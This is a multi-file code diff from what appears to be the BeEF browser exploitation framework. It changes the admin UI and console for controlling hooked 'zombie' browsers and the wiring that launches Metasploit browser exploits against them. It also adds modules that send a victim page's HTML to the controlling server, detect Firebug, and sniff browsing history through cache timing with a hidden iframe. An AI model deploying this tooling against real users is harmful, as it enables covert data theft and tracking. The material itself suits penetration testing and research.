print_info("[XSSRAYS] Starting XSSRays on HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
print_info("[XSSRAYS] Starting XSSRays [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
end
end
@@ -116,7 +116,7 @@ class Xssrays < BeEF::Extension::AdminUI::HttpController
)
xssrays_scan.save
print_info("[XSSRAYS] Starting XSSRays on HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
print_info("[XSSRAYS] Starting XSSRays [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
end
end
end
@@ -124,4 +124,4 @@ end
end
end
end
end
end

14
extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
View File

@@ -21,27 +21,25 @@ ZombieTab = function(zombie) {
requester_tab = new ZombieTab_Requester(zombie);
xssrays_tab = new ZombieTab_XssRaysTab(zombie);
//-------------------------------------------
ZombieTab.superclass.constructor.call(this, {
id: zombie.session,
id:"current-browser",
activeTab: 0,
loadMask: {msg:'Loading browser...'},
title: zombie.ip,
title: "Current Browser",
autoScroll: true,
closable: true,
closable: false,
viewConfig: {
forceFit: true,
type: 'fit'
},
items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab]
});
};
Ext.extend(ZombieTab, Ext.TabPanel, {
listeners: {
close: function(panel) {
panel.destroy();
}
activate: function(panel) {},
deactivate: function(panel) {},
close: function(panel) {}
}
});

14
extensions/admin_ui/media/javascript/ui/panel/common.js
View File

@@ -132,7 +132,7 @@ function get_dynamic_payload_details(payload, zombie) {
generate_form_input_field(Ext.getCmp("payload-panel"), input, null, false, zombie);
});
Ext.getCmp("payload-panel").doLayout();
Ext.getCmp("payload-panel").doLayout();
}
})
}
@@ -145,7 +145,7 @@ function get_dynamic_payload_details(payload, zombie) {
* @param: {Object} the targeted Zombie.
* @param: {Object} the status bar.
*/
function genExisingExploitPanel(panel, command_id, zombie, sb) {
function genExistingExploitPanel(panel, command_id, zombie, sb) {
if(typeof panel != 'object') {
Ext.beef.msg('Bad!', 'Incorrect panel chosen.');
return;
@@ -304,7 +304,7 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
var xgrid = Ext.getCmp('command-module-grid-zombie-'+zombie.session);
var sb = Ext.getCmp('commands-bbar-zombie-'+zombie.session);
panel.removeAll();
if(command_module_name == 'some special command module') {
//HERE we will develop specific panels for the command modules that require it.
} else {
@@ -327,9 +327,8 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
}
module = module.command_modules[1];
panel.removeAll();
var form = new Ext.form.FormPanel({
var form = new Ext.form.FormPanel({
url: submiturl,
id: 'form-command-module-zombie-'+zombie.session,
@@ -394,7 +393,7 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
bodyBorder: false,
height: 200,
hidden: true,
border: false //we can remove the border of the panel
border: false //we can remove the border of the panel
});
Ext.each(module.Data, function(input){
@@ -402,7 +401,6 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
);
form.add(payload_panel);
panel.add(form);
panel.doLayout();
// hide the load mask after rendering of the config panel is done

14
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js
View File

@@ -77,7 +77,7 @@ ZombieTab_Commands = function(zombie) {
if(!command_id) return;
genExisingExploitPanel(command_module_config, command_id, zombie, commands_statusbar);
genExistingExploitPanel(command_module_config, command_id, zombie, commands_statusbar);
});
LoadCommandPanelEvent = function(node,keyclick) {
@@ -95,7 +95,7 @@ ZombieTab_Commands = function(zombie) {
nonce: Ext.get ("nonce").dom.value
}
});
genNewExploitPanel(command_module_config, node.id, node.text, zombie, commands_statusbar);
commands_statusbar.showValid('Ready');
}
@@ -139,16 +139,12 @@ ZombieTab_Commands = function(zombie) {
'afterrender' : function() {
},
'selectionchange' : function() {
console.log("selection changed");
},
'activate' : function() {
console.log("activate");
},
'select' : function() {
console.log("select");
},
'keyup' : function() {
console.log("Key up");
},
'render' : function(c) {
c.getEl().on('keyup', function() {
@@ -189,4 +185,8 @@ ZombieTab_Commands = function(zombie) {
var sb = Ext.getCmp('command-module-bbar-zombie-'+zombie.session);
};
Ext.extend(ZombieTab_Commands, Ext.Panel, {});
Ext.extend(ZombieTab_Commands, Ext.Panel, {
listeners: {
close: function(panel) {}
}
});

2
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js
View File

@@ -102,8 +102,6 @@ ZombieTab_Requester = function(zombie) {
// itemclick: function(item) {
// switch (item.id) {
// case 'do-something':
// console.log("history_panel_context_menu.rowIndex: " + history_panel_context_menu.rowIndex);
// console.log("history_panel_context_menu.dbIndex: " + history_panel_context_menu.dbIndex);
// break;
// }
// }

7
extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
View File

@@ -113,12 +113,13 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
//creates a new hooked browser tab when a hooked browser is clicked
click: function(node, e) {
if(!node.leaf) return;
if(!mainPanel.get(node.attributes.session)) {
mainPanel.remove(mainPanel.getComponent('current-browser'));
if(!mainPanel.getComponent('current-browser')) {
mainPanel.add(new ZombieTab(node.attributes));
}
mainPanel.activate(node.attributes.session);
mainPanel.activate(mainPanel.getComponent('current-browser'));
},
//show the context menu when a HB is right-clicked
contextmenu: function(node, event){

33
extensions/console/extension.rb
View File

@@ -24,39 +24,8 @@ module Console
#
@short_name = @full_name = 'console'
@description = 'console environment to manage beef'
#
# Returns true of the verbose option has been enabled for the console.
# False if not.
#
# Example:
#
# $ ruby console.rb -v
# BeEF::Extension::Console.verbose? # => true
#
# $ ruby console.rb
# BeEF::Extension::Console.verbose? # => false
#
def self.verbose?
CommandLine.parse[:verbose]
end
#
# Returns true if we should reset the database. False if not.
#
# $ ruby console.rb -x
# BeEF::Extension::Console.resetdb? # => true
#
# $ ruby console.rb
# BeEF::Extension::Console.resetdb? # => false
#
def self.resetdb?
CommandLine.parse[:resetdb]
end
end
end
end
require 'extensions/console/banners'
require 'extensions/console/commandline'

6
extensions/console/lib/command_dispatcher/command.rb
View File

@@ -56,7 +56,7 @@ class Command
print_line("Module parameters:")
driver.interface.cmd['Data'].each{|data|
print_line(data['name'] + " => \"" + data['value'] + "\" # this is the " + data['ui_label'] + " parameter")
print_line(data['name'] + " => \"" + data['value'].to_s + "\" # this is the " + data['ui_label'] + " parameter")
} if not driver.interface.cmd['Data'].nil?
end
@@ -153,7 +153,9 @@ class Command
print_line("Results retrieved: " + Time.at(output[0]['date'].to_i).to_s)
print_line("")
print_line("Response:")
print_line(output[0]['data']['data'].to_s)
output.each do |op|
print_line(op['data']['data'].to_s)
end
end
end
end

23
extensions/console/lib/command_dispatcher/core.rb
View File

@@ -31,6 +31,7 @@ class Core
"back" => "Move back from the current context",
"exit" => "Exit the console",
"help" => "Help menu",
"irb" => "Drops into an interactive Ruby environment",
"jobs" => "Print jobs",
"online" => "List online hooked browsers",
"offline" => "List previously hooked browsers",
@@ -236,6 +237,28 @@ class Core
print_status("Target a particular online, hooked browser")
print_status(" Usage: target <id>")
end
def cmd_irb(*args)
@@bare_opts.parse(args) {|opt, idx, val|
case opt
when "-h"
cmd_irb_help
return false
end
}
print_status("Starting IRB shell...\n")
begin
Rex::Ui::Text::IrbShell.new(binding).run
rescue
print_error("Error during IRB: #{$!}\n\n#{$@.join("\n")}")
end
end
def cmd_irb_help(*args)
print_status("Load the IRB, Interative Ruby Shell")
end
def cmd_review(*args)
@@bare_opts.parse(args) {|opt, idx, val|

32
extensions/console/lib/shellinterface.rb
View File

@@ -195,7 +195,7 @@ class ShellInterface
def2.push({'name' => k, 'value' => v})
}
# End hack
if BeEF::Module.execute(mod_key, self.targetsession.to_s, def2) == true
if BeEF::Module.execute(mod_key, self.targetsession.to_s, def2) != nil
return true
else
return false
@@ -417,21 +417,6 @@ class ShellInterface
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the internal ip address
internal_ip = BD.get(self.targetsession, 'InternalIP')
if not internal_ip.nil?
encoded_internal_ip = CGI.escapeHTML(internal_ip)
encoded_internal_ip_hash = { 'Internal IP' => encoded_internal_ip }
page_name_row = {
'category' => 'Host',
'data' => encoded_internal_ip_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the System Platform
system_platform = BD.get(self.targetsession, 'SystemPlatform')
if not system_platform.nil?
@@ -447,21 +432,6 @@ class ShellInterface
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the internal hostname
internal_hostname = BD.get(self.targetsession, 'InternalHostname')
if not internal_hostname.nil?
encoded_internal_hostname = CGI.escapeHTML(internal_hostname)
encoded_internal_hostname_hash = { 'Internal Hostname' => encoded_internal_hostname }
page_name_row = {
'category' => 'Host',
'data' => encoded_internal_hostname_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the zombie screen size and color depth
screen_params = BD.get(self.targetsession, 'ScreenParams')
if not screen_params.nil?

BIN
extensions/demos/html/checkJava.class Normal file
View File

Binary file not shown.

BIN
extensions/demos/html/checkJava.jar Normal file
View File

Binary file not shown.

19
extensions/demos/html/checkJava.java Executable file
View File

@@ -0,0 +1,19 @@
import java.io.*;
import java.util.*;
import java.net.*;
import java.applet.*;
// Keith Lee
// Twitter: @keith55
// http://milo2012.wordpress.com
// keith.lee2012[at]gmail.com
public class checkJava extends Applet{
public static int results = 0;
public void init() {
}
public int getInfo() {
results = 1;
return results;
}
}

21
extensions/initialization/handler.rb
View File

@@ -81,7 +81,6 @@ module BeEF
# add a log entry for the newly hooked browser
BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}")
# get and store browser name
browser_name = get_param(@data['results'], 'BrowserName')
if BeEF::Filters.is_valid_browsername?(browser_name)
@@ -170,22 +169,6 @@ module BeEF
self.err_msg "Invalid system platform returned from the hook browser's initial connection."
end
# get and store the internal ip address
internal_ip = get_param(@data['results'], 'InternalIP')
if BeEF::Filters.is_valid_ip?(internal_ip)
BD.set(session_id, 'InternalIP', internal_ip)
else
self.err_msg "Invalid internal IP address returned from the hook browser's initial connection."
end
# get and store the internal hostname
internal_hostname = get_param(@data['results'], 'InternalHostname')
if BeEF::Filters.is_valid_hostname?(host_name)
BD.set(session_id, 'InternalHostname', internal_hostname)
else
self.err_msg "Invalid internal hostname returned from the hook browser's initial connection."
end
# get and store the hooked browser type
browser_type = get_param(@data['results'], 'BrowserType')
if BeEF::Filters.is_valid_browsertype?(browser_type)
@@ -274,6 +257,10 @@ module BeEF
self.err_msg "Invalid value for hasPersistentCookies returned from the hook browser's initial connection."
end
# log a few info of newly hooked zombie in the console
print_info "New Hooked Browser [ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
# Call autorun modules
autorun = []
BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|

244
extensions/metasploit/api.rb
View File

@@ -14,166 +14,166 @@
# limitations under the License.
#
module BeEF
module Extension
module Metasploit
module API
module Extension
module Metasploit
module API
module MetasploitHooks
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Modules, 'post_soft_load')
# Load modules from metasploit just after all other module config is loaded
def self.post_soft_load
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf.login
msf_module_config = {}
path = BeEF::Core::Configuration.instance.get('beef.extension.metasploit.path')
if not BeEF::Extension::Console.resetdb? and File.exists?("#{path}msf-exploits.cache")
module MetasploitHooks
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Modules, 'post_soft_load')
# Load modules from metasploit just after all other module config is loaded
def self.post_soft_load
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf.login
msf_module_config = {}
path = BeEF::Core::Configuration.instance.get('beef.extension.metasploit.path')
if not BeEF::Core::Console::CommandLine.parse[:resetdb] and File.exists?("#{path}msf-exploits.cache")
print_debug "Attempting to use Metasploit exploits cache file"
raw = File.read("#{path}msf-exploits.cache")
begin
msf_module_config = YAML.load(raw)
msf_module_config = YAML.load(raw)
rescue => e
puts e
puts e
end
count = 1
msf_module_config.each{|k,v|
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [k])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_payload_options', [k,nil])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [k, nil, nil])
print_over "Loaded #{count} Metasploit exploits."
count += 1
msf_module_config.each { |k, v|
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [k])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_payload_options', [k, nil])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [k, nil, nil])
print_over "Loaded #{count} Metasploit exploits."
count += 1
}
print "\r\n"
else
else
msf_modules = msf.call('module.exploits')
count = 1
msf_modules['modules'].each{|m|
next if not m.include? "/browser/"
m_details = msf.call('module.info', 'exploit', m)
if m_details
key = 'msf_'+m.split('/').last
# system currently doesn't support multilevel categories
#categories = ['Metasploit']
#m.split('/')[0...-1].each{|c|
# categories.push(c.capitalize)
#}
msf_module_config[key] = {
'enable'=> true,
'msf'=> true,
'msf_key' => m,
'name'=> m_details['name'],
'category' => 'Metasploit',
'description'=> m_details['description'],
'authors'=> m_details['references'],
'path'=> path,
'class'=> 'Msf_module'
}
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [key])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_payload_options', [key,nil])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [key, nil, nil])
print_over "Loaded #{count} Metasploit exploits."
count += 1
end
msf_modules['modules'].each { |m|
next if not m.include? "/browser/"
m_details = msf.call('module.info', 'exploit', m)
if m_details
key = 'msf_'+m.split('/').last
# system currently doesn't support multilevel categories
#categories = ['Metasploit']
#m.split('/')[0...-1].each{|c|
# categories.push(c.capitalize)
#}
msf_module_config[key] = {
'enable'=> true,
'msf'=> true,
'msf_key' => m,
'name'=> m_details['name'],
'category' => 'Metasploit',
'description'=> m_details['description'],
'authors'=> m_details['references'],
'path'=> path,
'class'=> 'Msf_module'
}
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_options', [key])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'get_payload_options', [key, nil])
BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Module, 'override_execute', [key, nil, nil])
print_over "Loaded #{count} Metasploit exploits."
count += 1
end
}
print "\r\n"
File.open("#{path}msf-exploits.cache", "w") do |f|
f.write(msf_module_config.to_yaml)
print_debug "Wrote Metasploit exploits to cache file"
f.write(msf_module_config.to_yaml)
print_debug "Wrote Metasploit exploits to cache file"
end
end
BeEF::Core::Configuration.instance.set('beef.module', msf_module_config)
end
BeEF::Core::Configuration.instance.set('beef.module', msf_module_config)
end
end
end
# Get module options + payloads when the beef framework requests this information
def self.get_options(mod)
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf_key != nil and msf.login
msf_module_options = msf.call('module.options', 'exploit', msf_key)
com = BeEF::Core::Models::CommandModule.first(:name => mod )
if msf_module_options
# Get module options + payloads when the beef framework requests this information
def self.get_options(mod)
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf_key != nil and msf.login
msf_module_options = msf.call('module.options', 'exploit', msf_key)
com = BeEF::Core::Models::CommandModule.first(:name => mod)
if msf_module_options
options = BeEF::Extension::Metasploit.translate_options(msf_module_options)
options << { 'name' => 'mod_id', 'id' => 'mod_id' , 'type' => 'hidden', 'value' => com.id}
options << {'name' => 'mod_id', 'id' => 'mod_id', 'type' => 'hidden', 'value' => com.id}
msf_payload_options = msf.call('module.compatible_payloads', msf_key)
if msf_payload_options
options << BeEF::Extension::Metasploit.translate_payload(msf_payload_options)
return options
options << BeEF::Extension::Metasploit.translate_payload(msf_payload_options)
return options
else
print_error "Unable to retrieve metasploit payloads for exploit: #{msf_key}"
print_error "Unable to retrieve metasploit payloads for exploit: #{msf_key}"
end
else
else
print_error "Unable to retrieve metasploit options for exploit: #{msf_key}"
end
end
end
end
end
# Execute function for all metasploit exploits
def self.override_execute(mod, hbsession, opts)
msf = BeEF::Extension::Metasploit::RpcClient.instance
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
msf_opts = {}
# Execute function for all metasploit exploits
def self.override_execute(mod, hbsession, opts)
msf = BeEF::Extension::Metasploit::RpcClient.instance
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
msf_opts = {}
opts.each { |opt|
next if ['e','ie_session','and_module_id'].include? opt['name']
msf_opts[opt["name"]] = opt["value"]
}
opts.each { |opt|
next if ['e', 'ie_session', 'and_module_id'].include? opt['name']
msf_opts[opt["name"]] = opt["value"]
}
if msf_key != nil and msf.login
# Are the options correctly formatted for msf?
# This call has not been tested
msf.call('module.execute', 'exploit', msf_key, msf_opts)
end
if msf_key != nil and msf.login
# Are the options correctly formatted for msf?
# This call has not been tested
msf.call('module.execute', 'exploit', msf_key, msf_opts)
end
hb = BeEF::HBManager.get_by_session(hbsession)
if not hb
print_error "Could not find hooked browser when attempting to execute module '#{mod}'"
return false
end
hb = BeEF::HBManager.get_by_session(hbsession)
if not hb
print_error "Could not find hooked browser when attempting to execute module '#{mod}'"
return false
end
bopts = []
uri = ""
if msf_opts['SSL']
uri += "https://"
else
uri += "http://"
end
config = BeEF::Core::Configuration.instance.get('beef.extension.metasploit')
uri += config['callback_host'] + ":" + msf_opts['SRVPORT'] + "/" + msf_opts['URIPATH']
bopts = []
uri = ""
if msf_opts['SSL']
uri += "https://"
else
uri += "http://"
end
config = BeEF::Core::Configuration.instance.get('beef.extension.metasploit')
uri += config['callback_host'] + ":" + msf_opts['SRVPORT'] + "/" + msf_opts['URIPATH']
bopts << { :sploit_url => uri }
c = BeEF::Core::Models::Command.new(:data => bopts.to_json,
:hooked_browser_id => hb.id,
:command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod}.db.id"),
:creationdate => Time.new.to_i
).save
bopts << {:sploit_url => uri}
c = BeEF::Core::Models::Command.new(:data => bopts.to_json,
:hooked_browser_id => hb.id,
:command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod}.db.id"),
:creationdate => Time.new.to_i
).save
# Still need to create command object to store a string saying "Exploit launched @ [time]", to ensure BeEF can keep track of
# which exploits where executed against which hooked browsers
return true
end
# Still need to create command object to store a string saying "Exploit launched @ [time]", to ensure BeEF can keep track of
# which exploits where executed against which hooked browsers
return true
end
# Get module options + payloads when the beef framework requests this information
def self.get_payload_options(mod,payload)
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
# Get module options + payloads when the beef framework requests this information
def self.get_payload_options(mod, payload)
msf_key = BeEF::Core::Configuration.instance.get("beef.module.#{mod}.msf_key")
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf_key != nil and msf.login
msf_module_options = msf.call('module.options', 'payload', payload)
com = BeEF::Core::Models::CommandModule.first(:name => mod )
if msf_module_options
msf = BeEF::Extension::Metasploit::RpcClient.instance
if msf_key != nil and msf.login
msf_module_options = msf.call('module.options', 'payload', payload)
com = BeEF::Core::Models::CommandModule.first(:name => mod)
if msf_module_options
options = BeEF::Extension::Metasploit.translate_options(msf_module_options)
return options
else
else
print_error "Unable to retrieve metasploit payload options for exploit: #{msf_key}"
end
end
end
end
end
end
end
end
end
end
end
end

10
extensions/proxy/proxy.rb
View File

@@ -37,13 +37,19 @@ module BeEF
def handle_request socket
request_line = socket.readline
# HTTP method # defaults to GET
method = request_line[/^\w+/]
url = request_line[/^\w+\s+(\S+)/, 1]
# HTTP version # defaults to 1.0
version = request_line[/HTTP\/(1\.\d)\s*$/, 1]
version = "1.0" if version.nil?
# url # host:port/path
url = request_line[/^\w+\s+(\S+)/, 1]
# We're overwriting the URI::Parser UNRESERVED regex to prevent BAD URI errors when sending attack vectors (see tolerant_parser)
tolerant_parser = URI::Parser.new(:UNRESERVED => BeEF::Core::Configuration.instance.get("beef.extension.requester.uri_unreserved_chars"))
uri = tolerant_parser.parse(url)
uri = tolerant_parser.parse(url.to_s)
raw_request = request_line
content_length = 0

2
extensions/qrcode/qrcode.rb
View File

@@ -25,7 +25,7 @@ module Qrcode
require 'uri'
configuration = BeEF::Core::Configuration.instance
BeEF::Extension::Console::Banners.interfaces.each do |int|
BeEF::Core::Console::Banners.interfaces.each do |int|
print_success "QRCode images available for interface: #{int}"
data = ""
configuration.get("beef.extension.qrcode.target").each do |target|

14
extensions/requester/api/hook.rb
View File

@@ -65,16 +65,16 @@ module BeEF
#@note: retrieve HTTP headers values needed later, and the \r\n that indicates the start of the post-data (if any)
req_parts.each_with_index do |value, index|
if value.match(/^Content-Length/)
@content_length = Integer(req_parts[index].split(/: /)[1])
if value.match(/^Content-Length:\s+(\d+)/)
@content_length = Integer(req_parts[index].split(/:\s+/)[1])
end
if value.match(/^Host/)
@host = req_parts[index].split(/: /)[1].split(/:/)[0]
@port = req_parts[index].split(/: /)[1].split(/:/)[1]
@host = req_parts[index].split(/:\s+/)[1].split(/:/)[0]
@port = req_parts[index].split(/:\s+/)[1].split(/:/)[1]
end
if value.eql?("") or value.strip.empty?# this will be the CRLF (before HTTP request body)
if value.eql?("") or value.strip.empty? # this will be the CRLF (before HTTP request body)
@post_data_index = index
end
end
@@ -111,7 +111,7 @@ module BeEF
http_request_object = {
'id' => http_db_object.id,
'method' => verb,
'host' => @host.strip,
'host' => @host,
'port' => @port,
'data' => @post_data,
'uri' => uri,
@@ -123,7 +123,7 @@ module BeEF
http_request_object = {
'id' => http_db_object.id,
'method' => verb,
'host' => @host.strip,
'host' => @host,
'port' => @port,
'uri' => uri,
'headers' => headers,

2
extensions/xssrays/handler.rb
View File

@@ -77,7 +77,7 @@ module BeEF
)
xssrays_detail.save
end
print_info("[XSSRAYS] Received ray from HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] received ray [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
print_debug("[XSSRAYS] Ray info: \n #{@request.query_string}")
end

3
install
View File

@@ -23,7 +23,7 @@ if RUBY_VERSION < '1.9'
puts "Ruby version " + RUBY_VERSION + " is no longer supported. Please upgrade 1.9 or later."
puts ""
puts "OSX:"
puts "sudo port install ruby19 +nosuffix"
puts "See README"
puts "\n"
exit
end
@@ -36,3 +36,4 @@ puts "\nRun bundler in your BeEF folder: bundle install"
puts "\nRun BeEF: ./beef"
#Testing fork regroup

21
modules/browser/detect_firebug/command.js Normal file
View File

@@ -0,0 +1,21 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var result = "Disabled or not installed";
if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "firebug="+result);
});

26
modules/browser/detect_firebug/config.yaml Normal file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
detect_firebug:
enable: true
category: "Browser"
name: "Detect FireBug"
description: "This module checks if the Mozilla Firefox Firebug extension is being use to inspect the current window."
authors: ["bcoles"]
target:
working: ["FF"]
not_working: ["All"]

24
modules/browser/detect_firebug/module.rb Normal file
View File

@@ -0,0 +1,24 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Detect_firebug < BeEF::Core::Command
def post_execute
content = {}
content['firebug'] = @datastore['firebug'] if not @datastore['firebug'].nil?
save content
end
end

7
modules/browser/get_page_html/command.js
View File

@@ -16,18 +16,17 @@
beef.execute(function() {
try {
var html_head = escape(document.head.innerHTML.toString());
var html_head = document.head.innerHTML.toString();
} catch (e) {
var html_head = "Error: document has no head";
}
try {
var html_body = escape(document.body.innerHTML.toString());
var html_body = document.body.innerHTML.toString();
} catch (e) {
var html_body = "Error: document has no body";
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'head='+html_head);
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'body='+html_body);
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'head='+html_head+'&body='+html_body);
});

3
modules/browser/get_page_html/module.rb
View File

@@ -17,7 +17,8 @@ class Get_page_html < BeEF::Core::Command
def post_execute
content = {}
content['html'] = @datastore['html']
content['head'] = @datastore['head']
content['body'] = @datastore['body']
save content
end

344
modules/browser/get_visited_domains/command.js Normal file
View File

@@ -0,0 +1,344 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
var hidden_iframe = beef.dom.createInvisibleIframe();
hidden_iframe.setAttribute('id','f');
hidden_iframe.setAttribute('name','f');
hidden_iframe.setAttribute('src','about:blank');
hidden_iframe.setAttribute('style','opacity: 0.1');
var results = "";
var tries = 0;
var isIE = 0;
var isFF = 0;
/*******************************
* SUB-MS TIMER IMPLEMENTATION *
*******************************/
var cycles = 0;
var exec_next = null;
function timer_interrupt() {
cycles++;
if (exec_next) {
var cmd = exec_next;
exec_next = null;
cmd();
}
}
if (beef.browser.isFF() == 1) {
window.addEventListener('message', timer_interrupt, false);
/****************
* SCANNED URLS *
****************/
var targets = [
{ 'category': 'Social networks' },
{ 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] },
{ 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] },
{ 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz',
'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] },
{ 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] },
{ 'category': 'Content platforms' },
{ 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] },
{ 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] },
{ 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] },
{ 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] },
{ 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] },
{ 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] },
{ 'category': 'Online media' },
{ 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] },
{ 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css',
